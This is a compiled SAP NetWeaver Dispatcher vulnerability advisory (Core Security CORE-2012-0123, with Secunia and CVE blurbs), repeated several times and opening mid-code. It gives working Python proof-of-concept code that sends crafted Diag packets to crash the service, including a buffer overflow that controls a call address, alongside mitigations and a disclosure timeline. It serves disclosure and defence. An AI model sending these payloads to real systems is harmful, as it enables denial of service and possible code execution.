return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA48980 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 RELEASE DATE: 2012-05-09 DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48980/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system. The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies. ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA48980 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 RELEASE DATE: 2012-05-09 DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48980/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system. The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies. ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. 